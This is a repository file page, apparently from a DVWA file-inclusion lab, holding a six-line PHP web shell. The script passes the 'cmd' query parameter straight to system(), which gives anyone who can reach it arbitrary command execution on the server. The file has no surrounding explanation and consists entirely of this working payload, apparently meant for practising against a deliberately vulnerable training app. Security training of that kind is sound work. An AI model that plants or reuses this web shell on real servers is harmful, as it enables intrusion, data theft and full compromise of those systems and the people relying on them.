cspj-application/dvwa/file-inclusion

6 lines
75 B
Plaintext
Raw Permalink Normal View History

2025-02-06 06:56:15 +08:00
<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>